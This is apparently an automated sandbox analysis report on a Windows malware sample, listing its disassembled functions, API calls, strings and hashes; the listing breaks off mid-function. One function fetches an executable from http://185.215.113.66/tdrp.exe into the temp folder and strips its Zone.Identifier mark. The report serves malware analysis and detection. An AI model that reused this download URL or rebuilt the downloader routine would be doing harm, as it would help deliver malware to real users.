                                                                                                                                                                                                      • String ID: www.update.microsoft.com
                                                                                                                                                                                                      • API String ID: 4063137541-1705189816
                                                                                                                                                                                                      • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                                      • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                                      Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3943618503-0
                                                                                                                                                                                                      • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                                      • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                                      Function 0040C830 Relevance: 4.5, APIs: 3, Instructions: 26encryptionCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                                                                                      • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                                                      • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                      • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                                                                                      Function 0040DF20 Relevance: 3.0, APIs: 2, Instructions: 15timenativeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                      • RtlTimeToSecondsSince1980.NTDLL ref: 0040DF38
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$QuerySecondsSince1980System
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1987401769-0
                                                                                                                                                                                                      • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                                      • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                                                                                                      Function 00404090 Relevance: 1.7, Strings: 1, Instructions: 488COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                                                                                      • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                                      • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                                                                                                      Function 0040FB45 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • NtQueryVirtualMemory.NTDLL ref: 0040FBF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MemoryQueryVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2850889275-0
                                                                                                                                                                                                      • Opcode ID: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                                                                                      • Instruction ID: 340d7b290d5355f760e33cf283827fd55aa9a8eadb82a746881808a00d0f8de8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD61D6316046098FDB39CB29D49166A73A5FF85754F25813BDC06E7AD0E338EC4ACA4C
                                                                                                                                                                                                      Function 0040A890 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapsProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1420622215-0
                                                                                                                                                                                                      • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                                      • Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E
                                                                                                                                                                                                      Function 0040AEB0 Relevance: .4, Instructions: 371COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                                                                                      • Instruction ID: 161e6bb5934f27057a9722b698e232d6f14762762655f0a3ce64c62cefac505d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D127DB4D012199FCB48CF99D9919AEFBB2FF88304F24856AE415BB345D734AA01CF94
                                                                                                                                                                                                      Function 0040F908 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                                      • Instruction ID: 80201675dd9b1cda4480dbd7700016e3944d41601b7f9a5a171a0727e2a58fe8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3821D872900204ABCB24EF69C8819A7B7A5FF44350B05807AED559B285D734F919CBE0
                                                                                                                                                                                                      Function 0040F560 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                                      • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                                      • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                                      • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7CC
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.Wu
                                                                                                                                                                                                      • API String ID: 1632876846-3869032167
                                                                                                                                                                                                      • Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                                                                                      • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                                                                                      Function 004064A0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 111networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                                      • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                                      • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                                      • %temp%, xrefs: 004064CB
                                                                                                                                                                                                      • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                                      • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                                      • .Wu, xrefs: 004065F2, 0040662D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe$.Wu
                                                                                                                                                                                                      • API String ID: 2816847299-3679779081
                                                                                                                                                                                                      • Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                                      • Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28
                                                                                                                                                                                                      Function 0040B850 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 558 40b850-40b867 call 40b780 561 40b869 558->561 562 40b86e-40b88a call 40b3d0 strcmp 558->562 563 40baf5-40baf8 561->563 566 40b891-40b8ad call 40b3d0 strstr 562->566 567 40b88c 562->567 570 40b8f0-40b90c call 40b3d0 strstr 566->570 571 40b8af-40b8cb call 40b3d0 strstr 566->571 567->563 578 40b90e-40b92a call 40b3d0 strstr 570->578 579 40b94f-40b96b call 40b3d0 strstr 570->579 576 40b8eb 571->576 577 40b8cd-40b8e9 call 40b3d0 strstr 571->577 576->563 577->570 577->576 588 40b94a 578->588 589 40b92c-40b948 call 40b3d0 strstr 578->589 586 40b96d-40b989 call 40b3d0 strstr 579->586 587 40b9ae-40b9c4 EnterCriticalSection 579->587 600 40b9a9 586->600 601 40b98b-40b9a7 call 40b3d0 strstr 586->601 592 40b9cf-40b9d8 587->592 588->563 589->579 589->588 593 40ba09-40ba14 call 40bb00 592->593 594 40b9da-40b9ea 592->594 607 40baea-40baef LeaveCriticalSection 593->607 608 40ba1a-40ba28 593->608 597 40ba07 594->597 598 40b9ec-40ba05 call 40df20 594->598 597->592 598->593 600->563 601->587 601->600 607->563 610 40ba2a 608->610 611 40ba2e-40ba3f call 40a740 608->611 610->611 611->607 614 40ba45-40ba62 call 40df20 611->614 617 40ba64-40ba74 614->617 618 40baba-40bad2 614->618 619 40ba80-40bab8 call 40ab60 617->619 620 40ba76-40ba7e Sleep 617->620 621 40bad8-40bae3 call 40bb00 618->621 619->621 620->617 621->607 626 40bae5 call 40b530 621->626 626->607
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                        • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                      • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                      • API String ID: 2906596889-2213908610
                                                                                                                                                                                                      • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                                      • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
                                                                                                                                                                                                      Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
